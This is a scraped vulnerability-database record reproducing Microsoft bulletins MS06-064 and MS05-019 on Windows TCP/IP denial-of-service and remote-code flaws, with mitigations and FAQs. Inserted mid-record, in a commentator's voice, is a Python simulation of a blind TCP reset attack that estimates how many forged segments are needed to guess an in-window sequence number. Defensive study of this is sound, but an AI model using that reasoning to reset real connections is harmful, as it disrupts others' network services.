Service Pack 2 and Windows Server 2003 Service Pack 1, called Windows Firewall, is able to block this traffic. 
If you are running IPv6 on a Windows XP Service Pack 1 system you should apply the update identified in KB Article 817778 \u201cOverview of the Advanced Networking Pack for Windows XP\u201d to get an updated Internet Connection Firewall which is able to handle IPv6 traffic.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate ICMP messages.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed as affecting the IPv4 implementation of TCP/IP. It has been assigned Common Vulnerabilities and Exposures (CVE) number CVE-2004-0790. There is a variant of this issue that has been assigned CVE number CVE-2004-0791. The Microsoft security update for CVE-2004-0790 also addresses CVE-2004-0791.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nHow does this vulnerability relate to the vulnerability that is corrected by MS05-019?\r\nMS05-019 addressed the same vulnerability in the more commonly adopted and deployed IPv4 implementation of TCP/IP. This update addresses the vulnerability in the IPv6 implementation.\r\n\r\nTCP Connection Reset Vulnerability - CVE-2004-0230:\r\n\r\nA denial of service vulnerability exists in the IPv6 Windows implementation of TCP. 
An attacker who successfully exploited this vulnerability could cause the affected system to drop an existing TCP connection.\r\n\r\nMitigating Factors for TCP Connection Reset Vulnerability - CVE-2004-0230:\r\n\u2022 An attacker must be able to predict or discover the IP address and port information of the source and of the destination of an existing TCP network connection. An attacker would also have to predict or learn certain hard-to-guess TCP segment details, namely a sequence number the target will accept. Protocols or programs that maintain long sessions and have predictable TCP/IP information are at an increased risk for this issue.\r\n\u2022 IPv6 support is not installed by default on Windows XP Service Pack 1 and Windows XP Service Pack 2, Windows Server 2003 and Windows Server 2003 Service Pack 1.\r\n\u2022 An attacker\u2019s system must belong to the same IPv6 network as the target system.\r\n\u2022 Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. Affected systems that allow any TCP connections to the Internet may be vulnerable to this issue.\r\n\u2022 This attack would have to be performed on each TCP connection that was targeted for reset. Many applications will automatically restore connections that have been reset.\r\n\r\nWorkarounds for TCP Connection Reset Vulnerability - CVE-2004-0230:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. 
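The first and last mitigating factors above (the attacker must guess the sequence number and port details, and must attack each connection separately) can be put into numbers. The following is an added example in Python written for this page, not Microsoft's code or a description of its patch: it contrasts the classic RFC 793 acceptance rule, under which any RST whose sequence number lands inside the receive window tears down the connection, with the stricter exact-match rule that was later standardized in RFC 5961 (the bulletin does not say what check the update applies, so the strict variant is shown only as the well-known hardening). The connection state, window size and function names are constructed for the illustration.

```python
SEQ_MOD = 1 << 32


def in_receive_window(seq, rcv_nxt, rcv_wnd):
    """RFC 793 acceptability test: rcv_nxt <= seq < rcv_nxt + rcv_wnd, modulo 2**32."""
    return (seq - rcv_nxt) % SEQ_MOD < rcv_wnd


def rst_accepted(seq, rcv_nxt, rcv_wnd, strict=False):
    """Decide whether a RST segment tears down the connection.
    Classic behaviour (the pre-patch stacks this bulletin describes) resets on any
    in-window RST. The strict variant, the approach later standardized in RFC 5961 and
    not described by the bulletin, resets only on an exact rcv_nxt match; an in-window
    but inexact RST would instead be answered with a challenge ACK."""
    if strict:
        return seq % SEQ_MOD == rcv_nxt % SEQ_MOD
    return in_receive_window(seq, rcv_nxt, rcv_wnd)


def expected_guesses(rcv_wnd, strict=False, candidate_ports=1):
    """Segments a blind attacker must send to sweep the whole sequence space once the
    addresses are known: ceil(2**32 / window) per plausible source port, or 2**32 per
    port when the stack is strict."""
    per_port = SEQ_MOD if strict else -(-SEQ_MOD // rcv_wnd)  # ceiling division
    return per_port * candidate_ports


def blind_reset_attempts(rcv_nxt, rcv_wnd, strict=False, max_attempts=1 << 16):
    """Simulate the attacker's strategy: walk the sequence space in window-sized
    strides (one by one when the stack is strict) and count segments until one is
    accepted. Returns None when the budget runs out, which is the point of the
    strict check."""
    stride = 1 if strict else rcv_wnd
    seq = 0
    for attempts in range(1, max_attempts + 1):
        if rst_accepted(seq, rcv_nxt, rcv_wnd, strict):
            return attempts
        seq = (seq + stride) % SEQ_MOD
    return None


if __name__ == "__main__":
    # Constructed connection state: the victim's next expected sequence number
    # and a 64 KiB receive window, typical of a long-lived session.
    rcv_nxt, rcv_wnd = 0x12345678, 65535
    print("classic stack, segments until reset:", blind_reset_attempts(rcv_nxt, rcv_wnd))
    print("classic stack, worst case          :", expected_guesses(rcv_wnd))
    print("classic stack, 1024 candidate ports :", expected_guesses(rcv_wnd, candidate_ports=1024))
    print("strict stack, worst case           :", expected_guesses(rcv_wnd, strict=True))
    print("strict stack within the same budget:", blind_reset_attempts(rcv_nxt, rcv_wnd, strict=True))
```

The stride equals the window because one guess per window is enough to cover it, so a classic stack with a 64 KiB window falls to a few thousand forged segments once the four-tuple is known, which is why long-lived sessions on well-known ports are the realistic targets. Multiplying by the number of plausible source ports is what the "predict or discover the port information" factor buys the defender; the strict rule removes the window from the equation entirely.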
When a workaround reduces functionality, it is identified in the following section.\r\n\u2022 Uninstall IPv6.\r\n\r\nFor the IPv6 protocol for Windows XP with SP2, Windows XP with SP1, or Windows Server 2003, do the following:\r\n\r\n1. Log on to the computer with a user account that has privileges to change network configuration.\r\n2. Click Start, click Control Panel, and then double-click Network Connections.\r\n3. Click Microsoft TCP/IP version 6 (for Windows XP with SP2 or Windows Server 2003) or Microsoft IPv6 Developer Edition (for Windows XP with SP1), and then click Uninstall.\r\n4. When prompted to confirm the removal of the Microsoft IPv6 Developer Edition or Microsoft TCP/IP version 6 protocol, click OK.\r\n\r\nAlternately, from the Windows XP or Windows Server 2003 desktop do the following:\r\n\r\n1. Click Start, point to Programs, point to Accessories.\r\n2. Click Command Prompt.\r\n3. At the command prompt, type netsh interface ipv6 uninstall.\r\n\r\nImpact of Workaround: Uninstalling IPv6 would result in the system not being able to communicate with other hosts on an IPv6 configured network.\r\n\r\nFAQ for TCP Connection Reset Vulnerability - CVE-2004-0230:\r\n\r\nWhat is the scope of the vulnerability?\r\nA denial of service vulnerability exists in the IPv6 Windows implementation of TCP. An attacker who successfully exploited this vulnerability could cause the affected system to drop an existing TCP connection.\r\n\r\nWhat causes the vulnerability?\r\nThe stack accepts a RST segment whose sequence number merely falls somewhere within the receive window, so an attacker who guesses an in-window value, without ever seeing the connection's traffic, can cause the reset of an existing connection.\r\n\r\nWhat is IPv6?\r\nInternet Protocol version 6 (IPv6), a new suite of standard protocols for the network layer of the Internet, is built into Microsoft Windows XP and later. 
IPv6 is designed to solve many of the problems of the current version of IP (known as IPv4) such as address depletion, security, autoconfiguration, and extensibility. To learn more about IPv6, please read the following Microsoft FAQ for IPv6.\r\n\r\nWhat is TCP/IP?\r\nTCP/IP is a set of networking protocols. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who exploited this vulnerability could cause the affected system to reset TCP connections.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system and learn or predict the required TCP details could try to exploit this vulnerability. An attacker\u2019s system must belong to the same IPv6 network as a target system.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to reset TCP connections.\r\n\r\nAn attacker must be able to predict or discover the IP address and port information of the source and of the destination of an existing TCP network connection. An attacker would also have to predict or learn certain difficult TCP network packet details.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll affected operating systems are at risk from this vulnerability. However, servers are at primary risk from this vulnerability because they maintain connections with clients that could be vulnerable to the connection reset. Protocols or programs that maintain long sessions and have predictable TCP/IP information are at an increased risk for this issue.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. 
An attacker could try to exploit this vulnerability over the Internet.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate TCP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2004-0230.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had seen examples of proof of concept code published publicly but had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nDoes applying this security update help protect customers from the code that has been published publicly that attempts to exploit this vulnerability?\r\nYes. This security update addresses the proof of concept code that has been published publicly. The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CVE-2004-0230.\r\n\r\nHow does this vulnerability relate to the vulnerability that is corrected by MS05-019?\r\nMS05-019 addressed the same vulnerability in the more commonly adopted and deployed IPv4 implementation of TCP/IP. This update addresses the vulnerability in the IPv6 implementation.\r\n\r\nSpoofed Connection Request Vulnerability - CVE-2005-0688:\r\n\r\nA denial of service vulnerability exists in Windows in the IPv6 implementation of TCP/IP. 
An attacker who successfully exploited this vulnerability could cause the affected system to stop responding.\r\n\r\nMitigating Factors for Spoofed Connection Request Vulnerability - CVE-2005-0688:\r\n\u2022 IPv6 support is not installed by default on Windows XP Service Pack 1, Windows XP Service Pack 2, Windows Server 2003, and Windows Server 2003 Service Pack 1.\r\n\u2022 An attacker\u2019s system must belong to the same IPv6 network as the target system.\r\n\u2022 The affected system returns to a normal operational state after the specially crafted packets are finished processing.\r\n\u2022 A typical network deployment scenario would limit the attack to an individual network segment as most routers will not forward these kinds of specially crafted TCP/IP network packets.\r\n\u2022 Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. Affected systems that allow any IP connections to the Internet may be vulnerable to this issue.\r\n\r\nWorkarounds for Spoofed Connection Request Vulnerability - CVE-2005-0688:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. 
When a workaround reduces functionality, it is identified in the following section.\r\n\u2022 Uninstall IPv6.\r\n\r\nFor the IPv6 protocol for Windows XP with SP2, Windows XP with SP1, or Windows Server 2003, do the following:\r\n\r\n1. Log on to the computer with a user account that has privileges to change network configuration.\r\n2. Click Start, click Control Panel, and then double-click Network Connections.\r\n3. Click Microsoft TCP/IP version 6 (for Windows XP with SP2 or Windows Server 2003) or Microsoft IPv6 Developer Edition (for Windows XP with SP1), and then click Uninstall.\r\n4. When prompted to confirm the removal of the Microsoft IPv6 Developer Edition or Microsoft TCP/IP version 6 protocol, click OK.\r\n\r\nAlternately, from the Windows XP or Windows Server 2003 desktop do the following:\r\n\r\n1. Click Start, point to Programs, point to Accessories.\r\n2. Click Command Prompt.\r\n3. At the command prompt, type netsh interface ipv6 uninstall.\r\n\r\nImpact of Workaround: Uninstalling IPv6 would result in the system not being able to communicate with other hosts on an IPv6 configured network.\r\n\r\nFAQ for Spoofed Connection Request Vulnerability - CVE-2005-0688:\r\n\r\nWhat is the scope of the vulnerability?\r\n\r\nThis is a denial of service vulnerability. An attacker who exploited this vulnerability could cause the affected system to stop responding for a limited time as a result of excessive CPU utilization. During that time, affected systems cannot respond to requests. Note that the denial of service vulnerability would not allow an attacker to execute code or elevate their user rights, but it could cause the affected system to stop accepting requests.\r\n\r\nWhat causes the vulnerability?\r\nThe affected operating systems perform incomplete validation of TCP/IP network packets. 
This vulnerability occurs when a Transmission Control Protocol (TCP) SYN packet is received with a spoofed source Internet Protocol (IP) address and port number that is identical to that of the destination IP address and port. The effect of this makes it appear that the host computer has sent a packet to itself. If this attack is successful, a loop is created and extra computer CPU time is used.\r\n\r\nWhat is IPv6?\r\nInternet Protocol version 6 (IPv6), a new suite of standard protocols for the network layer of the Internet, is built into Microsoft Windows XP and later. IPv6 is designed to solve many of the problems of the current version of IP (known as IPv4) such as address depletion, security, autoconfiguration, and extensibility. To learn more about IPv6, please read the following FAQ for IPv6.\r\n\r\nWhat is TCP/IP?\r\nTCP/IP is a set of networking protocols. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who exploited this vulnerability could cause the affected system to stop responding.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to stop responding.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll affected operating systems are at risk from this vulnerability.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. 
However, this attack requires that routers forward malformed TCP/IP network packets. Most routers will not forward these kinds of malformed TCP/IP network packets.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate TCP/IP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed for the IPv4 implementation of TCP/IP. It has been assigned Common Vulnerability and Exposure number CVE-2005-0688. It also has been named \u201cLand Attack\u201d by the larger security community.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had seen examples of proof of concept code published publicly but had not received any information to indicate that this vulnerability had been publicly used to attack customers using IPv6 when this security bulletin was originally issued.\r\n\r\nDoes applying this security update help protect customers from the code that has been published publicly that attempts to exploit this vulnerability?\r\nYes. This security update addresses the vulnerability that is demonstrated by the existing proof of concept code that has been published.\r\n\r\nHow does this vulnerability relate to the vulnerability that is corrected by MS05-019?\r\nMS05-019 addressed the same vulnerability in the more commonly adopted and deployed IPv4 implementation of TCP/IP. This update addresses the vulnerability in the IPv6 implementation.\r\n\r\nDisclaimer:\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. 
In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions:\r\n\u2022 V1.0 (October 10, 2006): Bulletin published.", "edition": 1, "cvss3": {}, "published": "2006-10-11T00:00:00", "title": "Microsoft Security Bulletin MS06-064 Vulnerabilities in TCP/IP IPv6 Could Allow Denial of Service (922819)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2004-0230", "CVE-2005-0688"], "modified": "2006-10-11T00:00:00", "id": "SECURITYVULNS:DOC:14617", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14617", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:12", "description": "Microsoft Security Bulletin MS05-019\r\nVulnerabilities in TCP/IP Could Allow Remote Code Execution and Denial of Service (893066)\r\n\r\nIssued: April 12, 2005\r\nVersion: 1.0\r\nSummary\r\n\r\nWho should read this document: Customers who use Microsoft Windows\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately.\r\n\r\nSecurity Update Replacement: None.\r\n\r\nCaveats: Microsoft Knowledge Base Article 893066 documents the currently known issues that customers may experience when they install this security update. The article also documents recommended solutions for these issues. 
For more information, see Microsoft Knowledge Base Article 893066.\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022 Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4 \u2013 Download the update\r\n\u2022 Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2 \u2013 Download the update\r\n\u2022 Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) \u2013 Download the update\r\n\u2022 Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) \u2013 Download the update\r\n\u2022 Microsoft Windows Server 2003 \u2013 Download the update\r\n\u2022 Microsoft Windows Server 2003 for Itanium-based Systems \u2013 Download the update\r\n\u2022 Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME) \u2013 Review the FAQ section of this bulletin for details about these operating systems.\r\n\r\nNon-Affected Software:\r\n\u2022 Microsoft Windows Server 2003 Service Pack 1\r\n\u2022 Microsoft Windows Server 2003 with SP1 for Itanium-based Systems\r\n\u2022 Microsoft Windows Server 2003 x64 Edition\r\n\u2022 Microsoft Windows XP Professional x64 Edition\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nGeneral Information\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves several newly-discovered, privately-reported and public vulnerabilities. 
Each vulnerability is documented in this bulletin in its own \u201cVulnerability Details\u201d section.\r\n\r\nAn attacker who successfully exploited the most severe of these vulnerabilities could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. However, an attacker who successfully exploited the most severe of these vulnerabilities would most likely cause the affected system to stop responding.\r\n\r\nWe recommend that customers apply the update immediately.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\nVulnerability Identifiers\tImpact of Vulnerability\tWindows 98, 98 SE, ME\tWindows 2000\tWindows XP Service Pack 1\tWindows XP Service Pack 2\tWindows Server 2003\r\nIP Validation Vulnerability - CAN-2005-0048\tRemote Code Execution\tNot Critical\tCritical\tCritical\tNone\tNone\r\nICMP Connection Reset Vulnerability - CAN-2004-0790\tDenial of Service\tNot Critical\tModerate\tModerate\tModerate\tModerate\r\nICMP Path MTU Vulnerability - CAN-2004-1060\tDenial of Service\tNot Critical\tModerate\tModerate\tModerate\tModerate\r\nTCP Connection Reset Vulnerability - CAN-2004-0230\tDenial of Service\tNot Critical\tLow\tLow\tNone\tLow\r\nSpoofed Connection Request Vulnerability - CAN-2005-0688\tDenial of Service\tNone\tNone\tNone\tLow\tLow\r\nAggregate Severity of All Vulnerabilities\t\tNot Critical\tCritical\tCritical\tModerate\tModerate\r\n\r\nThis assessment is based on the types of systems that are 
affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nNote: The severity ratings for non-x86 operating system versions map to the x86 operating system versions as follows:\r\n\u2022 The Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) severity rating is the same as the Windows XP Service Pack 1 severity rating.\r\n\u2022 The Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) severity rating is the same as the Windows XP Service Pack 1 severity rating.\r\n\u2022 The Microsoft Windows Server 2003 for Itanium-based Systems severity rating is the same as the Windows Server 2003 severity rating.\r\n\r\nFrequently asked questions (FAQ) related to this security update\r\n\r\nWhy does this update address several reported security vulnerabilities?\r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers can install only this update.\r\n\r\nDoes this update contain any security-related changes to functionality?\r\nYes. Besides the changes that are listed in each \u201cVulnerability Details\u201d section of this bulletin, this update includes additional security changes that are based on the result of a security review of the affected components. The default TCPWindowSize registry value has been changed on some operating systems. A new MaxIcmpHostRoutes registry value has also been introduced to control ICMP Path MTU related behavior. 
Administrators should consider reviewing Microsoft Knowledge Base Article 890345 and Microsoft Knowledge Base Article 896350 for more information about these registry changes prior to installing this security update.\r\n\r\nHow does the extended support for Windows 98, Windows 98 Second Edition, and Windows Millennium Edition affect the release of security updates for these operating systems?\r\nMicrosoft will only release security updates for critical security issues. Non-critical security issues are not offered during this support period. For more information about the Microsoft Support Lifecycle policies for these operating systems, visit the following Web site.\r\n\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nAre Windows 98, Windows 98 Second Edition, or Windows Millennium Edition critically affected by one or more of the vulnerabilities that are addressed in this security bulletin?\r\nNo. None of these vulnerabilities are critical in severity on Windows 98, on Windows 98 Second Edition, or on Windows Millennium Edition. For more information about severity ratings, visit the following Web site.\r\n\r\nI am still using Windows XP, but extended security update support ended on September 30th, 2004. What should I do?\r\n\r\nThe original version of Windows XP, generally known as Windows XP Gold or Windows XP Release to Manufacturing (RTM) version, reached the end of its extended security update support life cycle on September 30, 2004.\r\n\r\nIt should be a priority for customers who have this operating system version to migrate to supported operating system versions to prevent potential exposure to vulnerabilities. For more information about the Windows Service Pack Product Lifecycle, visit the Microsoft Support Lifecycle Web site. 
For more information about the Windows Product Lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nFor more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nExtended security update support for Microsoft Windows NT 4.0 Workstation Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT 4.0 Server Service Pack 6a ended on December 31, 2004. I\u2019m still using one of these operating systems, what should I do?\r\n\r\nWindows NT 4.0 Workstation Service Pack 6a, Windows NT 4.0 Server Service Pack 6a, and Windows 2000 Service Pack 2 have reached the end of their life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require additional support for Windows NT 4.0 SP6a must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager.\r\n\r\nFor more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) to determine whether this update is required?\r\nYes. MBSA will determine whether this update is required. 
For more information about MBSA, visit the MBSA Web site.\r\n\r\nCan I use Systems Management Server (SMS) to determine whether this update is required?\r\nYes. SMS can help detect and deploy this security update. For information about SMS, visit the SMS Web site. The Security Update Inventory Tool is required for detecting Microsoft Windows and other affected Microsoft products. For more information about the limitations of the Security Update Inventory Tool, see Microsoft Knowledge Base Article 306460.\r\n\r\nVulnerability Details\r\n\r\nIP Validation Vulnerability - CAN-2005-0048:\r\n\r\nA remote code execution vulnerability exists that could allow an attacker to send a specially crafted IP message to an affected system. An attacker who successfully exploited this vulnerability could cause the affected system to remotely execute code. However, attempts to exploit this vulnerability would most likely result in a denial of service.\r\n\r\nMitigating Factors for IP Validation Vulnerability - CAN-2005-0048:\r\n\u2022 This attack requires that routers forward malformed IP network packets. Most routers will not forward these kinds of malformed IP network packets.\r\n\u2022 Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. Affected systems that allow any IP connections to the Internet may be vulnerable to this issue.\r\n\u2022 If enabled, the Internet Connection Firewall does mitigate this vulnerability on Windows XP Service Pack 1. 
Windows XP Service Pack 2 and Windows Server 2003 were not vulnerable to this issue.\r\n\r\nWorkarounds for IP Validation Vulnerability - CAN-2005-0048:\r\n\u2022 ISA Server 2000 and ISA Server 2004 can be used to block the affected types of traffic. Please review the ISA Server Preventative Measures Documentation for more information on how to use ISA Server to help mitigate this vulnerability.\r\n\u2022 Use a personal firewall, such as the Internet Connection Firewall, which is included with Windows XP Service Pack 1.\r\n\r\nBy default, the Internet Connection Firewall feature in Windows XP Service Pack 1 helps protect your Internet connection by blocking unsolicited incoming traffic. We recommend that you block all unsolicited incoming communication from the Internet.\r\n\r\nTo enable the Internet Connection Firewall feature by using the Network Setup Wizard, follow these steps:\r\n\r\n1. Click Start, and then click Control Panel.\r\n2. In the default Category View, click Network and Internet Connections, and then click Setup or change your home or small office network. 
The Internet Connection Firewall feature is enabled when you select a configuration in the Network Setup Wizard that indicates that your system is connected directly to the Internet.\r\n\r\nTo configure Internet Connection Firewall manually for a connection, follow these steps:\r\n\r\n1. Click Start, and then click Control Panel.\r\n2. In the default Category View, click Networking and Internet Connections, and then click Network Connections.\r\n3. Right-click the connection on which you want to enable Internet Connection Firewall, and then click Properties.\r\n4. Click the Advanced tab.\r\n5. Click to select the Protect my computer or network by limiting or preventing access to this computer from the Internet check box, and then click OK.\r\n\r\nNote: If you want to enable certain programs and services to communicate through the firewall, click Settings on the Advanced tab, and then select the programs, the protocols, and the services that are required.\r\n\r\nFAQ for IP Validation Vulnerability - CAN-2005-0048:\r\n\r\nWhat is the scope of the vulnerability?\r\n\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could remotely take complete control of an affected system. However, attempts to exploit this vulnerability would most likely result in a denial of service. An attacker who exploited this vulnerability could cause the affected system to stop responding and automatically restart. During that time, affected systems cannot respond to requests.\r\n\r\nWhat causes the vulnerability?\r\nThe affected operating systems perform incomplete validation of IP network packets.\r\n\r\nWhat is IP?\r\nThe Internet Protocol (IP) is part of the TCP/IP protocol suite. TCP/IP is a set of networking protocols that are widely used on the Internet. 
TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system. However, most likely, an attacker who exploited this vulnerability could cause the affected system to stop responding and to automatically restart.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to execute code or stop responding.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWindows 2000 and Windows XP Service Pack 1 are primarily at risk from this vulnerability. Windows XP Service Pack 2 and Windows Server 2003 provide additional validation that addresses this vulnerability.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. However, this attack requires that routers forward malformed IP network packets. Most routers will not forward these kinds of malformed IP network packets.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate IP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nNo. 
Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nICMP Connection Reset Vulnerability - CAN-2004-0790:\r\n\r\nA denial of service vulnerability exists that could allow an attacker to send a specially crafted Internet Control Message Protocol (ICMP) message to an affected system. An attacker who successfully exploited this vulnerability could cause the affected system to reset existing TCP connections.\r\n\r\nMitigating Factors for ICMP Connection Reset Vulnerability - CAN-2004-0790:\r\n\u2022 Firewall best practices and firewall or router configurations that block all ICMP traffic can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\n\u2022 For an attacker to try to exploit this vulnerability, they must first predict or learn the IP address and port information of the source and of the destination of an existing TCP network connection.\r\n\u2022 This attack would have to be performed on each TCP connection that was targeted for reset. 
Many applications will automatically restore connections that have been reset.\r\n\r\nWorkarounds for ICMP Connection Reset Vulnerability - CAN-2004-0790:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022 Block all ICMP network packets at the firewall or at the router:\r\n\r\nICMP network packets are used to initiate a connection with the affected components. Blocking them at the firewall or at the router will help protect systems that are behind that firewall or router from attempts to exploit this vulnerability. We recommend that you block all unsolicited inbound communication from the Internet. ISA Server 2000 and ISA Server 2004 can be used to block the affected types of traffic.\r\n\r\nImpact of Workaround: This workaround can also negatively impact performance by preventing TCP from optimizing network communication. ICMP network packets can eliminate fragmentation at routers connecting networks with different MTUs. Fragmentation reduces TCP throughput and increases network congestion.\r\n\u2022 Block ICMP traffic by using IPSec on the affected systems.\r\n\r\nUse Internet Protocol security (IPSec) to help protect network communications. Detailed information about IPSec and about how to apply filters is available in Microsoft Knowledge Base Article 313190 and Microsoft Knowledge Base Article 813878.\r\n\r\nImpact of Workaround: This workaround can also negatively impact performance by preventing TCP from optimizing network communication. ICMP network packets can eliminate fragmentation at routers connecting networks with different MTUs. 
